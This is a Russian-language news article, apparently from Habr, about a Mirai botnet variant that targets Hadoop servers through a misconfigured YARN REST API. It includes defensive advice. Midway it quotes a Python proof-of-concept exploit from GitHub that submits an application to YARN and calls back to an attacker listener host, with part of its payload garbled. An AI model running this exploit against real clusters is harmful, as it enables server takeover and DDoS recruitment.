Главная » Хабрахабр » Кроме IoT: ботнет Mirai начал атаковать машины на Linux

Кроме IoT: ботнет Mirai начал атаковать машины на Linux

Ботнет Mirai появился в 2016 году и за короткое время успел заразить более 600 тыс. IoT-устройств. На прошлой неделе стало известно о новой версии Mirai, цель которой — Linux-серверы с Hadoop. Разбираемся, какую уязвимость использует вирус и как её «прикрыть».


/ Flickr / D J Shin / CC BY-SA

Пара слов о Mirai

Mirai стал известен благодаря серии громких атак. Одна была на блог журналиста Брайана Кребса (Brian Krebs) после публикации статьи о продажах услуг ботнетов. Другая — на крупного DNS-провайдера Dyn, что вызвало сбой в работе мировых сервисов: Twitter, Reddit, PayPal, GitHub и многих других.

Вредонос мониторил интернет на наличие открытых telnet-портов и вводил перебором известные пары логин-пароль для доступа к учетной записи владельца устройства. Для «захвата» IoT-устройств ботнет использовал уязвимость, связанную со слабыми паролями (производители делали их одинаковыми для всех смарт-девайсов). В случае успеха гаджет становился частью «вредоносной сети».

Это привело к появлению ещё нескольких версий зловредного ПО, но все они делали своей целью устройства интернета вещей. В конце 2016 года разработчики выложили исходные коды вируса в сеть. До недавнего времени — теперь возник червь Mirai, который атакует Linux-серверы в дата-центрах.

Ботнет «вербует» Linux

Отчет о новой версии Mirai опубликовали специалисты по информационной безопасности компании NETSCOUT. Известно, что ботнет атакует серверы с установленным фреймворком Apache Hadoop. Как говорят специалисты по ИБ, хакеров привлекает мощность железа. Hadoop используется на серверах, занятых высокопроизводительными вычислениями и работой с алгоритмами машинного обучения. Сеть из производительных устройств позволит совершать более разрушительные DDoS-атаки.

Но теперь программе не нужно различать разные виды архитектур IoT-гаджетов, Mirai атакует только серверы с процессорами x86.
Вариант Mirai для Linux по-прежнему взламывает системы путем подбора заводских учетных данных по telnet.

Червь отправляет злоумышленникам IP-адрес уязвимой машины и пару логин-пароль для неё. При этом новый ботнет не ставит вредоносное ПО на взломанное устройство самостоятельно. Затем хакеры устанавливают DDoS-ботов вручную.

Какую уязвимость используют

Вредонос использует для проникновения на сервер уязвимость модуля YARN, отвечающего за управление ресурсами кластеров и планирование заданий в Apache Hadoop.

Подключаясь удаленно, злоумышленник получает возможность добавить в кластер новое приложение. При неверной конфигурации YARN атакующий может получить доступ к внутреннему REST API системы через порты 8088 и 8090. К слову, об этой проблеме известно уже несколько лет — на ExploitDB и GitHub опубликованы PoC-эксплоиты.

Например, на GitHub представлен следующий код эксплойта:

#!/usr/bin/env python import requests target = 'http://127.0.0.1:8088/'
lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps'
data = , }, 'application-type': 'YARN',
}
requests.post(url, json=data)

Кроме Mirai, эту уязвимость использует другой DDoS-бот — DemonBot, который обнаружили в октябре специалисты компании Radware. С начала осени они регистрировали более миллиона попыток взлома через уязвимость YARN ежедневно.

Что говорят эксперты

По словам ИБ-специалистов, больше всего попыток взлома пришлось на США, Великобританию, Италию, Германию. На начало месяца уязвимости в YARN были подвержены чуть более тысячи серверов по всему миру. Это не так много, однако все они обладают высокой вычислительной мощностью.

Пока таких случаев зарегистрировано не было, но эксперты предупреждают, что это лишь вопрос времени. Также есть информация, что уязвимость в Hadoop может предоставить злоумышленникам доступ к данным, которые хранятся на незащищенных серверах.

Причем все атаки идут с небольшого числа IP-адресов — не более сорока. Новый вариант Mirai распространяется не быстро — ежедневно происходит лишь несколько десятков тысяч попыток взломать Hadoop-машины через YARN.


/ Flickr / Jelene Morris / CC BY

Это означает, что у владельцев серверов с установленным Hadoop есть больше времени на закрытие уязвимости. Такое поведение злоумышленников и натолкнуло специалистов NETSCOUT на мысль, что вирус распространяется не автоматически — хакеры вручную сканируют интернет и внедряют программу на незащищенные машины.

Администраторам достаточно ограничить доступ к вычислительному кластеру — настроить IP-фильтры или полностью закрыть сеть от внешних пользователей и приложений. Для защиты от атаки нужно изменить настройки безопасности сети.

Чтобы предотвратить неавторизованный доступ к системе, специалисты по безопасности также советуют обновить Hadoop до версии 2.x и включить аутентификацию через протокол Kerberos.

Несколько постов из блога VAS Experts:
Пара свежих материалов из нашего блога на Хабре:


Оставить комментарий

Ваш email нигде не будет показан
Обязательные для заполнения поля помечены *

*

x

Ещё Hi-Tech Интересное!

Перевезти дата-центр за 14 400 секунд

Всем знакома пословица «Один переезд равен двум пожарам». Смысл этой народной мудрости в том, что процесс переезда сопряжен со стрессами, суетой, переживаниями и, конечно, беготней, которые бывают и при пожаре, а подчас и с утратами ценного имущества. К тому же, ...

Дорожная карта математических дисциплин для машинного обучения, часть 1

Вместо предисловия Допустим, сидя вечерком в теплом кресле вам вдруг пришла в голову шальная мысль: «Хм, а почему бы мне вместо случайного подбора гиперпараметров модели не узнать, а почему оно всё работает?»Это скользкий путь — вы думаете, что достаточно пары ...